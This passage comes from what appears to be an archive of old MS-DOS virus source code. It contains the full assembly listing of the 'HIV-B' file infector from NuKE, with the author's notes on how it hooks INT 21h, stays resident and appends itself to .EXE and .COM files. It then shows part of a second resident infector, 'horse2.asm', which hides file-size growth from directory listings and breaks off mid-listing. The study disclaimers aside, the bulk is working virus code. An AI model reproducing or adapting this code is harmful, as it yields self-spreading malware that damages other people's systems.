~~~~~~~~~~~~~ Anywayz, this Virus cums from the Murphy Virus! So
if you Scan it with SCAN McAfee & Ass. you will see that it will be
detected as the [Murphy] Virus! I got this Virus from Italy from the
"Italian Virus Laboratory!" Mind you this Virus Source is being
released to the public because it's an OLD Virus and is detectable!
and doesn't do any damage to the system! This virus was edited by
me, I removed some bugs inside and produced this SOURCE CODE ONLY!
[NOTE] Of course, this virus is ONLY for STUDYING, to learn on how
virus are made! After the viruses are old its NICE to release them so
people can study em!
HOW THE HIV - VIRUS WORKS
First, I'd like to thanx all those that thanked me for my latest
Virus! (ParaSite Virus)! And I'm glad to say I'll be releasing the
Source Codes to this virus in 6 MONTHS! Hopefully, by that time it
will be Detected by SCAN (McAfee & Ass) and yall will get a chance
to study this Assome Virus made totally from me...
HIV -: This virus Spreads thru coping itself to .EXE and .COM Files!
~~~~~~ You will notice the file gets larger by 1614 Bytes! The Virus
Hooks itself to Interrup 21h and totally system memory will be 1632
Bytes Less. Once the file is resident in Memory it will attach itself
to every file that is runned or opened! The date of the original file
Doesn't not change! All this virus does is Copy itself over and over
again! CleanUp V77+ will get rid of it...or Simple delete all files
Infected with the virus...Anywayz Enjoy...
NOTE: If you want to compile the source, simply look for it in the .TXT files
contained in DATA.EXE in this newsletter package.
DATA_1E EQU 4CH ; Just a Few Data Segments that are
DATA_3E EQU 84H ; Needed for the virus to find some
DATA_5E EQU 90H ; hard core info...
DATA_7E EQU 102H
DATA_8E EQU 106H
DATA_9E EQU 122H
DATA_10E EQU 124H
DATA_11E EQU 15AH
DATA_12E EQU 450H
DATA_13E EQU 462H
DATA_14E EQU 47BH
DATA_15E EQU 0
DATA_16E EQU 1
DATA_17E EQU 2
DATA_18E EQU 6
DATA_42E EQU 0FB2CH
DATA_43E EQU 0FB2EH
DATA_44E EQU 0FB4BH
DATA_45E EQU 0FB4DH
DATA_46E EQU 0FB83H
DATA_47E EQU 0FB8DH
DATA_48E EQU 0FB8FH
DATA_49E EQU 0FB95H
DATA_50E EQU 0FB97H
DATA_51E EQU 0
DATA_52E EQU 2
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h ; Compile this to a .COM file!
; So the Virus starts at 0100h
HIV PROC FAR
START:
JMP LOC_35
DB 0C3H
DB 23 DUP (0C3H)
DB 61H, 6EH, 74H, 69H, 64H, 65H
DB 62H, 0C3H, 0C3H, 0C3H, 0C3H
DB 'HIV-B Virus - Release 1.1 [NukE]'
DB ' '
copyright DB '(C) Edited by Rock Steady [NukE]'
DB 0, 0
DATA_24 DW 0
DATA_25 DW 0
DATA_26 DW 0
DATA_27 DW 706AH
DATA_28 DD 00000H
DATA_29 DW 0
DATA_30 DW 706AH
DATA_31 DD 00000H
DATA_32 DW 0
DATA_33 DW 706AH
DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
DB 'Edited by Rock Steady [NukE]', 0AH, 0DH
DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
DB '$'
DB 0E8H, 83H, 3, 3DH, 4DH, 4BH
DB 75H, 9, 55H, 8BH, 0ECH, 83H
DB 66H, 6, 0FEH, 5DH, 0CFH, 80H
DB 0FCH, 4BH, 74H, 12H, 3DH, 0
DB 3DH, 74H, 0DH, 3DH, 0, 6CH
DB 75H, 5, 80H, 0FBH, 0, 74H
DB 3
LOC_1:
JMP LOC_13
LOC_2:
PUSH ES ; Save All Regesters so that when
PUSH DS ; we restore the program it will
PUSH DI ; RUN correctly and hide the fact
PUSH SI ; that any Virii is tampering with
PUSH BP ; the System....
PUSH DX
PUSH CX
PUSH BX
PUSH AX
CALL SUB_6
CALL SUB_7
CMP AX,6C00H
JNE LOC_3 ; Jump if not equal
MOV DX,SI
LOC_3:
MOV CX,80H
MOV SI,DX
LOCLOOP_4:
INC SI ; Slowly down the System a
MOV AL,[SI] ; little.
OR AL,AL ; Zero ?
LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0
SUB SI,2
CMP WORD PTR [SI],4D4FH
JE LOC_7 ; Jump if equal
CMP WORD PTR [SI],4558H
JE LOC_6 ; Jump if equal
LOC_5:
JMP SHORT LOC_12 ;
DB 90H
LOC_6:
CMP WORD PTR [SI-2],452EH
JE LOC_8 ; Jump if equal
JMP SHORT LOC_5 ;
LOC_7:
NOP
CMP WORD PTR [SI-2],432EH
JNE LOC_5 ; Jump if not equal
LOC_8:
MOV AX,3D02H
CALL SUB_5
JC LOC_12 ; Jump if carry Set
MOV BX,AX
MOV AX,5700H
CALL SUB_5 ; Initsilize the virus...
MOV CS:DATA_24,CX ; A Basic Start up to check
MOV CS:DATA_25,DX ; The Interrup 21h
MOV AX,4200H
XOR CX,CX
XOR DX,DX
CALL SUB_5
PUSH CS
POP DS
MOV DX,103H
MOV SI,DX
MOV CX,18H
MOV AH,3FH
CALL SUB_5
JC LOC_10 ; Jump if carry Set
CMP WORD PTR [SI],5A4DH
JNE LOC_9 ; Jump if not equal
CALL SUB_1
JMP SHORT LOC_10
LOC_9:
CALL SUB_4
LOC_10:
JC LOC_11 ; Jump if carry Set
MOV AX,5701H
MOV CX,CS:DATA_24
MOV DX,CS:DATA_25
CALL SUB_5
LOC_11:
MOV AH,3EH ; '>'
CALL SUB_5
LOC_12:
CALL SUB_7
POP AX ; A Stealth Procedure to
POP BX ; end the virus and restore
POP CX ; the program! Pup back all
POP DX ; regesters as we found them!
POP BP ; so nothings changed...
POP SI
POP DI
POP DS
POP ES
LOC_13:
JMP CS:DATA_28
DB 0B4H, 2AH, 0CDH, 21H, 0C3H
HIV ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_1 PROC NEAR ; Start of the Virus!
MOV AH,2AH ; Get the Date system Date!
INT 21H ; If its Friday Display the
; message at Data34 and End!
CMP AL,6
JE LOC_15 ; If Friday display message
JNZ LOC_14 ; If not continue infecting
LOC_14: ; and screwing the system!
MOV CX,[SI+16H]
ADD CX,[SI+8]
MOV AX,10H
MUL CX ; dx:ax = reg * ax
ADD AX,[SI+14H]
ADC DX,0
PUSH DX
PUSH AX
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP DX,0
JNE LOC_16 ; Jump if not equal
CMP AX,64EH
JAE LOC_16 ; Jump if above or =
POP AX
POP DX
STC ; Set carry flag
RETN
LOC_15:
MOV DX,OFFSET DATA_34+18H ; Display Message at Data34!
MOV AH,9 ; With New Offset Address in
INT 21H ; memory!
;
POP AX ; Restore all Regesters as if
POP BX ; nothing was changed and exit
POP CX ; virus and run File...
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
MOV AH,0 ; Exit Virus if your in a .EXE
INT 21H ; File!!!
; Exit virus if your in a .COM
INT 20H ; File!!!
LOC_16:
MOV DI,AX
MOV BP,DX
POP CX
SUB AX,CX
POP CX
SBB DX,CX
CMP WORD PTR [SI+0CH],0
JE LOC_RET_19 ; Jump if equal
CMP DX,0
JNE LOC_17 ; Jump if not equal
CMP AX,64EH
JNE LOC_17 ; Jump if not equal
STC ; Set carry flag
RETN
LOC_17:
MOV DX,BP
MOV AX,DI
PUSH DX
PUSH AX
ADD AX,64EH
ADC DX,0
MOV CX,200H
DIV CX ; Find out How much System
LES DI,DWORD PTR [SI+2] ; memory is available...
MOV CS:DATA_26,DI ;
MOV CS:DATA_27,ES ; Every so often make the
MOV [SI+2],DX ; system memory small than
CMP DX,0 ; what it already is...
JE LOC_18 ; Screws up the users hehe
INC AX
LOC_18:
MOV [SI+4],AX
POP AX
POP DX
CALL SUB_2
SUB AX,[SI+8]
LES DI,DWORD PTR [SI+14H]
MOV DS:DATA_9E,DI
MOV DS:DATA_10E,ES
MOV [SI+14H],DX ; Tie up some memory!
MOV [SI+16H],AX ; release it on next execution
MOV DS:DATA_11E,AX ; Jump to su routine to do
MOV AX,4202H ; this and disable interrups
XOR CX,CX
XOR DX,DX
CALL SUB_5
CALL SUB_3
JC LOC_RET_19
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
MOV AH,40H
MOV DX,SI
MOV CX,18H
CALL SUB_5
LOC_RET_19:
RETN
SUB_1 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_2 PROC NEAR
MOV CX,4
MOV DI,AX
AND DI,0FH
LOCLOOP_20:
SHR DX,1 ; Shift w/zeros fill
RCR AX,1 ; Rotate thru carry
LOOP LOCLOOP_20 ; Loop if cx > 0
MOV DX,DI
RETN
SUB_2 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_3 PROC NEAR
MOV AH,40H
MOV CX,64EH
MOV DX,100H
CALL SUB_6
JMP SHORT LOC_24
DB 90H
;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_4:
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP AX,64EH
JB LOC_RET_23 ; Jump if below
CMP AX,0FA00H
JAE LOC_RET_23 ; Jump if above or =
PUSH AX
CMP BYTE PTR [SI],0E9H
JNE LOC_21 ; Jump if not equal
SUB AX,651H
CMP AX,[SI+1]
JNE LOC_21 ; Jump if not equal
POP AX
STC ; Set carry flag
RETN
LOC_21:
CALL SUB_3
JNC LOC_22 ; Jump if carry=0
POP AX
RETN
LOC_22:
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
POP AX
SUB AX,3
MOV DX,122H
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H
MOV CS:[SI+1],AX
MOV AH,40H
MOV CX,3
CALL SUB_5
LOC_RET_23:
RETN
SUB_3 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_5 PROC NEAR
LOC_24:
PUSHF ; Push flags
CALL CS:DATA_28
RETN
SUB_5 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_6 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable the interrupts
LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus
MOV CS:DATA_29,AX ; to the COM File...
MOV CS:DATA_30,ES
MOV AX,46AH
MOV DS:DATA_5E,AX
MOV WORD PTR DS:DATA_5E+2,CS
LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word..
MOV CS:DATA_32,AX ; get your info needed on
MOV CS:DATA_33,ES ; System...
LES AX,CS:DATA_31
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable the interrupts
POP ES ; and restore regesters!
POP DS ; go back to the file
POP AX ; being executed...
RETN
SUB_6 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_7 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable interrupts
LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy
MOV DS:DATA_5E,AX ; yourself to the EXE
MOV WORD PTR DS:DATA_5E+2,ES
LES AX,DWORD PTR CS:DATA_32
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable interrupts
POP ES
POP DS
POP AX
RETN
SUB_7 ENDP
DB 0B0H, 3, 0CFH, 50H, 53H, 51H
DB 52H, 56H, 57H, 55H, 1EH, 6
DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH
DB 62H, 4, 0A1H, 50H, 4, 2EH
DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H
DB 4, 0A3H, 50H, 4, 2EH, 0A1H
DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9
DB 0B9H, 1, 0, 0CDH, 10H, 0E8H
DB 34H, 0, 0E8H, 0B7H, 0, 2EH
DB 0A1H, 0C7H, 4, 0A3H, 50H, 4
DB 0B3H, 2, 0B8H, 2, 9, 0B9H
DB 1, 0, 0CDH, 10H, 2EH, 0A1H
DB 0CEH, 4, 0A3H, 50H, 4, 7
DB 1FH
DB ']_^ZY[X.'
DB 0FFH, 2EH, 0CAH, 4
DATA_36 DW 0
DATA_37 DW 1010H
DATA_39 DB 0
DATA_40 DD 706A0000H
DB 0, 0, 2EH, 0A1H, 0C7H, 4
DB 8BH, 1EH, 4AH, 4, 4BH, 2EH
DB 0F6H, 6, 0C9H, 4, 1, 74H
DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH
DB 80H, 36H, 0C9H, 4, 1, 0EBH
DB 0AH
LOC_25:
CMP AL,0
JG LOC_26 ; Jump if >
XOR CS:DATA_39,1
LOC_26:
TEST CS:DATA_39,2
JZ LOC_27 ; Jump if zero
CMP AH,18H
JB LOC_28 ; Jump if below
XOR CS:DATA_39,2
JMP SHORT LOC_28
LOC_27:
CMP AH,0
JG LOC_28 ; Jump if >
XOR CS:DATA_39,2
LOC_28:
CMP BYTE PTR CS:DATA_36,20H
JE LOC_29 ; Jump if equal
CMP BYTE PTR CS:DATA_37+1,0
JE LOC_29 ; Jump if equal
XOR CS:DATA_39,2
LOC_29:
TEST CS:DATA_39,1
JZ LOC_30 ; Jump if zero
INC BYTE PTR CS:DATA_37
JMP SHORT LOC_31
LOC_30:
DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H)
LOC_31:
TEST CS:DATA_39,2 ; (706A:04C9=0)
JZ LOC_32 ; Jump if zero
INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
JMP SHORT LOC_RET_33 ; (0555)
LOC_32:
DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
LOC_RET_33:
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_8 PROC NEAR
MOV AX,CS:DATA_37
MOV DS:DATA_12E,AX ; Get info on type of Video
MOV BH,DS:DATA_13E ; Display the system has...
MOV AH,8
INT 10H ; with ah=functn 08h
; basically fuck the cursur..
MOV CS:DATA_36,AX
RETN
SUB_8 ENDP
DB 50H, 53H, 51H, 52H, 56H, 57H
DB 55H, 1EH, 6, 33H, 0C0H, 50H
DB 1FH, 81H, 3EH, 70H, 0, 6DH
DB 4, 74H, 35H, 0A1H, 6CH, 4
DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH
DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0
DB 75H, 24H, 0FAH, 8BH, 2EH, 50H
DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH
DB 50H, 4, 0C4H, 6, 70H, 0
DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH
DB 6, 0CCH, 4, 0C7H, 6, 70H
DB 0, 6DH, 4, 8CH, 0EH, 72H
DB 0, 0FBH
LOC_34:
POP ES
POP DS ; Restore and get lost...
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_9 PROC NEAR
MOV DX,10H
MUL DX ; dx:ax = reg * ax
RETN
SUB_9 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_10 PROC NEAR
XOR AX,AX ; If if wants to dissamble
XOR BX,BX ; us give him a HARD time...
XOR CX,CX ; By making all into 0
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
XOR DI,DI ; Zero register
XOR BP,BP ; Zero register
RETN
SUB_10 ENDP
LOC_35:
PUSH DS
CALL SUB_11
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_11 PROC NEAR
MOV AX,4B4DH
INT 21H ; Load and EXEC file...
; be runned...
NOP
JC LOC_36 ; Jump if carry Set
JMP LOC_46
LOC_36:
POP SI
PUSH SI
MOV DI,SI
XOR AX,AX ; Zero register
PUSH AX
POP DS
LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr
MOV CS:DATA_49E[SI],AX ; Move lots of data
MOV CS:DATA_50E[SI],ES ; into CS to infect the file
LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit..
MOV CS:DATA_47E[DI],BX
MOV CS:DATA_48E[DI],ES
MOV AX,DS:DATA_7E
CMP AX,0F000H
JNE LOC_44 ; Jump if not equal
MOV DL,80H
MOV AX,DS:DATA_8E
CMP AX,0F000H
JE LOC_37 ; Jump if equal
CMP AH,0C8H
JB LOC_44 ; Jump if below
CMP AH,0F4H
JAE LOC_44 ; Jump if above or =
TEST AL,7FH
JNZ LOC_44 ; Jump if not zero
MOV DS,AX
CMP WORD PTR DS:DATA_51E,0AA55H
JNE LOC_44 ; Jump if not equal
MOV DL,DS:DATA_52E
LOC_37:
MOV DS,AX
XOR DH,DH ; Zero register
MOV CL,9
SHL DX,CL ; Shift w/zeros fill
MOV CX,DX
XOR SI,SI ; Zero register
LOCLOOP_38:
LODSW ; String [si] to ax
CMP AX,0FA80H
JNE LOC_39 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7380H
JE LOC_40 ; Jump if equal
JNZ LOC_41 ; Jump if not zero
LOC_39:
CMP AX,0C2F6H
JNE LOC_42 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7580H
JNE LOC_41 ; Jump if not equal
LOC_40:
INC SI
LODSW ; String [si] to ax
CMP AX,40CDH
JE LOC_43 ; Jump if equal
SUB SI,3
LOC_41:
DEC SI
DEC SI
LOC_42:
DEC SI
LOOP LOCLOOP_38 ; Loop if cx > 0
JMP SHORT LOC_44
LOC_43:
SUB SI,7
MOV CS:DATA_49E[DI],SI
MOV CS:DATA_50E[DI],DS
LOC_44:
MOV AH,62H
INT 21H ; Simple...Get the PSP
; Address (Program segment
MOV ES,BX ; address and but in BX)
MOV AH,49H
INT 21H ; Get the Free memory from
; the system
MOV BX,0FFFFH ; release extra memory blocks
MOV AH,48H
INT 21H ; Allocate the memory
; At BX (# bytes)
SUB BX,66H ; it attaches virus right
NOP ; under the 640k
JC LOC_46
MOV CX,ES ; did it work? If not just
STC ; end the virus...
ADC CX,BX
MOV AH,4AH
INT 21H ; Adjust teh memory block
; size! BX has the # of bytes
MOV BX,65H
STC ; Set carry flag
SBB ES:DATA_17E,BX ; Where to attach itself!
PUSH ES ; under 640K
MOV ES,CX
MOV AH,4AH
INT 21H ; Just change the memory
; allocations! (BX=Btyes Size)
MOV AX,ES
DEC AX
MOV DS,AX
MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k
CALL SUB_9
MOV BX,AX
MOV CX,DX
POP DS
MOV AX,DS
CALL SUB_9
ADD AX,DS:DATA_18E
ADC DX,0
SUB AX,BX
SBB DX,CX
JC LOC_45 ; Jump if carry Set
SUB DS:DATA_18E,AX
LOC_45:
MOV SI,DI
XOR DI,DI ; Zero register
PUSH CS
POP DS
SUB SI,4D7H
MOV CX,64EH
INC CX
REP MOVSB ; Rep when cx >0 Mov [si] to
MOV AH,62H ; es:[di]
INT 21H ; Get the Program segment
; prefix...so we can infect it
DEC BX
MOV DS,BX
MOV BYTE PTR DS:DATA_15E,5AH
MOV DX,1E4H
XOR AX,AX ; Zero register
PUSH AX
POP DS
MOV AX,ES
SUB AX,10H
MOV ES,AX
CLI ; Disable interrupts
MOV DS:DATA_3E,DX ;
MOV WORD PTR DS:DATA_3E+2,ES
STI ; Enable interrupts
DEC BYTE PTR DS:DATA_14E ;
LOC_46:
POP SI
CMP WORD PTR CS:DATA_42E[SI],5A4DH
JNE LOC_47 ; Jump if not equal
POP DS
MOV AX,CS:DATA_46E[SI]
MOV BX,CS:DATA_45E[SI] ; all this shit is to restore
PUSH CS ; the program and continue
POP CX ; running the original
SUB CX,AX ; program...
ADD CX,BX
PUSH CX
PUSH WORD PTR CS:DATA_44E[SI]
PUSH DS
POP ES
CALL SUB_10
RETF
LOC_47:
POP AX
MOV AX,CS:DATA_42E[SI]
MOV WORD PTR CS:[100H],AX
MOV AX,CS:DATA_43E[SI]
MOV WORD PTR CS:[102H],AX
MOV AX,100H
PUSH AX
PUSH CS
POP DS
PUSH DS
POP ES
CALL SUB_10
RETN
SUB_11 ENDP
SEG_A ENDS
END START
Rock Steady [NuKE]
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;

1009
MSDOS/Virus.MSDOS.Unknown.horse.asm Normal file
View File

File diff suppressed because it is too large Load Diff

558
MSDOS/Virus.MSDOS.Unknown.horse2.asm Normal file
View File

@ -0,0 +1,558 @@
.model tiny
.code
.radix 16
ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
org 0100h
CALL EntryPoint ; Call virus entry point
; Here begin virus by himself
EntryPoint:
POP BP ; Restore in BP address of data area
PUSH BX ; Save BX
PUSH CX ; Save CX
PUSH ES ; Save ES
PUSH DS ; Save DS
CLC ; Clear carry flag
MOV AX,4B4Bh ; Load AX with self-check word
INT 21 ; Call int21
JC Install ; If virus is loaded CF==0
PUSH DS ; Save DS
PUSH CS ; Set DS point to PSP
POP DS ;
MOV SI,DI ; SI=DI= virus CODE begin
SUB SI,0003 ; include CALL in the beginning
ADD SI,BP ; Adjust different offsets
MOV CX,047Ch ; Compare virus code only
CLD ; Clear direction
REP CMPSB ; Repeat until equal
POP DS ; Restore DS
PUSH DS ; Set ES = DS
POP ES
JZ ReturnControl ; If virus -> return to file
Install:
MOV CS:[offset FunCounter+BP],3456 ; Load generation counter
MOV AX,DS ; Move PSP segment in AX
DEC AX ; Compute MCB of PSP
MOV DS,AX ; Set DS to MCB
SUB [0003],0050 ; "Steal" some memory
MOV AX,ES:[0002] ; ????
SUB AX,0050 ; ????
MOV ES:[0002],AX ;
PUSH AX ; Save new virus segment
SUB DI,DI ; DI=0
MOV SI,BP ; SI point to virus begin
SUB SI,0003 ; Adjust CALL in the beginning
MOV DS,DI ; DS set to 0
MOV BX,Offset int21handler ; Load BX with int 21 handler
XCHG BX,[0084] ; and set it in vector table
MOV CS:[BP+offset Int21off],bx ; Save old vector offset
XCHG AX,[0086] ; Set new int21 seg & get old segment
MOV CS:[BP+offset Int21seg],ax ; Save old vector segment
POP ES ; Set ES point to new virus seg
PUSH CS ; Set DS point to current virus seg (PSP)
POP DS ;
MOV CX,offset LastByte ; Will move all virus
REP MOVSB ; Move virus in hi memory (as Eddie)
MOV AX,4BB4h ; Int21 is grabbed by virus
INT 21 ; This SetUp virus function
ReturnControl:
POP DS ; Restore DS
POP ES ; Restore ES
CMP byte ptr CS:[BP+ComFlag],43 ; Check if host file is COM
JZ ReturnCOM ; If COM -> exit COM
ReturnEXE:
MOV AX,CS:[BP+First3] ; Load AX with old IP
MOV DX,CS:[BP+First3+2] ; Load AX with old CS
MOV CX,CS ; Load CX with current run segment
SUB CX,CS:[BP+06] ; Calculate PSP+10h
MOV DI,CX ; Save result in DI
ADD DX,CX ; In DX is now start segment
POP CX ; ???
POP BX ; ???
CLI ; Disable interrupts
ADD DI,CS:[BP+04]
MOV SS,DI
STI
DoReturn: ; 009B
PUSH DX ; Push entry segment
PUSH AX ; Push entry offset
SUB AX,AX ; Clear registers
SUB DX,DX ; Clear of AX may cause trouble
SUB BP,BP ; with several programs (as DISKCOPY)
SUB SI,SI ; AX must be saved on entry and restored
SUB DI,DI ;
RETF ; Return control to EXE file
ReturnCOM:
POP CX ; ???
POP BX ; ???
MOV AX,[BP+First3] ; Load AX with first 2 instr
MOV [0100],AX ; and restore them at file begin
MOV AX,[BP+First3+2] ; Load AX with second 2 instr
MOV [0102],AX ; and restore them at file begin
MOV AX,0100 ; Set AX to entry offset
MOV DX,CS ; Set DX to entry segment
JMP short DoReturn ; Go to return code
FindFirstNext:
PUSHF ; Save flags
CALL dword ptr CS:[offset Dos21off] ; Call DOS
PUSH BX ; Save rezult of searching
PUSH ES
PUSH SI
PUSH AX
MOV SI,DX ; DS:SI point to FCB with search argument
CMP byte ptr [SI],0FFh ; Check for Extended FCB
JNZ NoDirCommand ; If FCB not extended then command is not DIR
MOV AH,2Fh ; Get DTA address; Result of search is in DTA
INT 21
MOV AX,ES:[BX+1Eh] ; Load file time to AX
AND AX,001Fh ; Mask seconds
CMP AX,001Fh ; Check if file seconds are 62
JNZ NoDirCommand ; If seconds!=62 -> file not infected
CMP ES:[BX+26h],0000 ; Check file size, hi byte
JNZ AdjustSize ; If file bigger than 64K -> immediate adjust
CMP ES:[BX+24h],offset LastCode ; Check low byte of file size
JC NoDirCommand ; If file is less than virus -> skip adjust
AdjustSize:
SUB ES:[BX+24h],offset LastCode ; Decrement file size with virus size
SBB ES:[BX+26h],0000 ; Decrement hi byte of size if need
NoDirCommand:
POP AX ; Restore registers
POP SI
POP ES
POP BX
IRET ; Return to caller
HereIam:
PUSH CS ; If AX==4B4B -> so virus call me
POP ES ; Set ES to virus segment
MOV DI,000C ; Set DI to virus code begin
IRET ; Return to caller
Int21handler:
CMP AH,11h ; If function is FindFirst
JZ FindFirstNext ; If so -> will adjust file size
CMP AH,12h ; If function is FindNext
JZ FindFirstNext ; If so -> will adjust file size
CMP AX,4B4Bh ; If AX==4B4B -> Identification
JZ HereIam ; function
CMP AX,4BB4h ; Setup function
JNZ Continue ; Continue checking of AH
JMP SetUp
Continue:
PUSH AX ; Save important registers
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH BP
PUSH DS
PUSH ES
CMP AH,3Eh ; If function CLOSE file handle
JZ CloseFile ;
CMP AX,4B00h ; If function is EXEC file
